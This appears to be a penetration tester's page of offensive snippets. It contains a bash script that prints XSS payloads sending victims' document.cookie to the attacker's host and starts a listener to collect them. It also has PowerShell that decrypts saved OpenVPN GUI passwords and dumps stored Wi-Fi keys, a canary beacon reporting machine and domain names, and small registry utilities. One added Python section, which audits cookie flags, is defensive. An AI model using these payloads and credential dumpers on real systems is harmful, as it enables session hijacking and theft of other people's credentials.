Just some snippets. Check out GitHub for everything.
cookie_theft.sh
For exploiting XSS to steal cookies. By default, it will start a Python http server on eth0 and port 80. It will also spit out some basic XSS payloads.
If you want to change the interface or port, run as: cookie_theft.sh <interface> <port>
#!/bin/bash
# CTF script to generate XSS payloads for stealing cookies
RED="\e[31m"
GREEN="\e[32m"
ENDCOLOR="\e[0m"
BOLD="\e[1m"
UNDERLINE="\e[4m"
echo -e "\n\n🍪${GREEN}Rapid Cookie Theft${ENDCOLOR} 🍪"
# Check the number of arguments
if (( $# == 0 )); then
    # Default values
    interface="eth0"
    port=80
elif (( $# == 2 )); then
    # Assign arguments
    interface=$1
    port=$2
else
    # Invalid number of arguments
    echo -e "${RED}[-]${ENDCOLOR} Unexpected arguments"
    echo -e "${RED}[-]${ENDCOLOR} Usage: cookie_theft.sh <interface> <port>"
    echo -e "${RED}[-]${ENDCOLOR} If no arguments are passed, defaults to eth0 and port 80"
    echo -e "${RED}[-]${ENDCOLOR} Exiting...\n"
    exit 1
fi
# Redirect stdout first, then stderr, so neither leaks to the terminal
if ! command -v python3 >/dev/null 2>&1
then
    echo -e "${RED}[-]${ENDCOLOR} python3 not found on system"
    echo -e "${RED}[-]${ENDCOLOR} Exiting...\n"
    exit 1
fi
# First IPv4 address bound to the chosen interface
ip=$(/sbin/ip -o -4 addr list "$interface" | awk '{print $4}' | cut -d/ -f1)
if [[ -z "$ip" ]]
then
    echo -e "${RED}[-]${ENDCOLOR} No IPv4 address found on interface $interface"
    echo -e "${RED}[-]${ENDCOLOR} Usage: cookie_theft.sh <interface> <port>"
    echo -e "${RED}[-]${ENDCOLOR} If no arguments are passed, defaults to eth0 and port 80"
    echo -e "${RED}[-]${ENDCOLOR} Exiting...\n"
    exit 1
fi
echo -e "${GREEN}[+] ${ENDCOLOR}Listening interface: ${UNDERLINE}$interface${ENDCOLOR} with IP: ${UNDERLINE}$ip${ENDCOLOR}"
echo -e "${GREEN}[+] ${ENDCOLOR}Listening Port: ${UNDERLINE}$port${ENDCOLOR}"
# Print payloads (every URL needs the http:// scheme, otherwise the browser treats it as a relative path)
echo -e "\n${GREEN}Example XSS Payloads:${ENDCOLOR}"
echo -e "---------------------------------------------------------------------------------------\n"
echo "<script>"
echo "fetch('http://$ip:$port', {"
echo "method: 'POST',"
echo "mode: 'no-cors',"
echo "body:document.cookie"
echo "});"
echo "</script>"
echo -e "\n---------------------------------------------------------------------------------------\n"
echo "<script>var i=new Image;i.src='http://$ip:$port/?'+document.cookie;</script>"
echo -e "\n---------------------------------------------------------------------------------------\n"
echo "<img src=x onerror=this.src='http://$ip:$port/?'+document.cookie;>"
echo -e "\n---------------------------------------------------------------------------------------\n"
echo -e "\"><script>document.location='http://$ip:$port/?'+document.cookie</script>"
echo -e "\n---------------------------------------------------------------------------------------\n"
echo -e "\n${GREEN}[+] ${ENDCOLOR}Starting HTTP server ${ENDCOLOR}"
# Start HTTP server; each exfiltrated cookie shows up as a request line in its access log
python3 -m http.server "$port"
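Every payload above reads document.cookie, which only exposes cookies set without the HttpOnly flag. The following is an added example, not part of the original snippets: a small Set-Cookie audit that reports which cookies in a response a script like the ones above could reach, plus the Secure and SameSite attributes a defender would check at the same time. The sample headers are constructed, not captured from a real site.

```python
"""Audit Set-Cookie headers for cookies exposed to document.cookie."""


def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie header value into name, value and lowercase attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip()   # flags like HttpOnly map to ""
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_cookie(cookie: dict) -> list:
    """Return findings for one parsed cookie; an empty list means it is hardened."""
    attrs = cookie["attrs"]
    findings = []
    if "httponly" not in attrs:
        findings.append("readable by document.cookie (no HttpOnly)")
    if "secure" not in attrs:
        findings.append("sent over plain HTTP (no Secure)")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("no SameSite=Lax/Strict")
    return findings


def audit_headers(headers) -> dict:
    """Map each cookie name to its list of findings."""
    return {c["name"]: audit_cookie(c) for c in map(parse_set_cookie, headers)}


# Constructed sample response headers for demonstration only.
SAMPLE_HEADERS = [
    "PHPSESSID=abc123; Path=/",
    "session=def456; Path=/; HttpOnly; Secure; SameSite=Lax",
    "theme=dark; Path=/; Secure",
]

if __name__ == "__main__":
    for name, findings in audit_headers(SAMPLE_HEADERS).items():
        print(f"{name}: {'; '.join(findings) if findings else 'OK'}")
```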
Clear Burp Suite's Recent Projects
Burp's recent projects are stored under HKCU:\Software\JavaSoft\Prefs\burp\ on Windows hosts. The snippet below clears those values. Useful for demoing Burp if you don't want previous project names to be visible.
foreach($i in 0..24){Set-ItemProperty -Path 'HKCU:\Software\JavaSoft\Prefs\burp\' -name suite.recent/Project/Files$i -Value ""}
Steal OpenVPN GUI Credentials
Dumps all saved OpenVPN GUI credentials from a Windows host. The password is DPAPI-protected with per-profile entropy stored next to it in the registry.
# OpenVPN GUI is not the same as OpenVPN Connect
Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object { Get-ItemProperty $_.PsPath }
foreach ($item in $items)
{
    $encryptedbytes = $item.'auth-data'
    $entropy = $item.'entropy'
    $keyname = $item.PSPath -split "\\"
    # Check if there is auth data for this profile
    if ($entropy) {
        # Drop the trailing null byte stored with the entropy
        $entropy = $entropy[0..(($entropy.Length) - 2)]
        $decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
            $encryptedbytes,
            $entropy,
            [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
        # Username is stored unencrypted as UTF-16 bytes
        $username = $item.'username'
        Write-Host ("Profile: " + $keyname[-1])
        $proflen = $keyname[-1] | Measure-Object -Character
        Write-Host ("-" * $proflen.Characters + "---------")
        Write-Host ("UserName: " + [System.Text.Encoding]::Unicode.GetString($username))
        Write-Host ("Password: " + [System.Text.Encoding]::Unicode.GetString($decryptedbytes) + "`n")
    }
    else {
        Write-Host ("No Auth Data for: " + $keyname[-1] + "`n")
    }
}
Steal Wireless Credentials
Dumps all saved SSIDs and their corresponding passwords from a Windows host.
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
Canary Token Cradle
using System;
using System.IO;
using System.Net;

// This C# method will trigger a canary alert when the compiled code is executed
// The alert will contain the machine name and domain name in the UserAgent field
// ex: mycomputer@companydomain.local
// Generate a web alert token at https://canarytokens.org/nest/
static void canary()
{
    // Build the web request; set token to your token URL
    var token = "<canary token>";
    HttpWebRequest request = (HttpWebRequest)WebRequest.Create(token);
    // Build the user agent from the hostname and domain
    var mn = Environment.MachineName;
    var dn = Environment.UserDomainName;
    request.UserAgent = (mn + "@" + dn);
    // Only the hit on the token URL matters; dispose the response and its stream
    using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
    using (Stream resStream = response.GetResponseStream())
    {
    }
}
Grab URI Handlers
Dumps all URI handlers from a Windows host.
gci -ea SilentlyContinue -recurse HKLM:\ | get-itemproperty | where { $_ -match 'URL:' }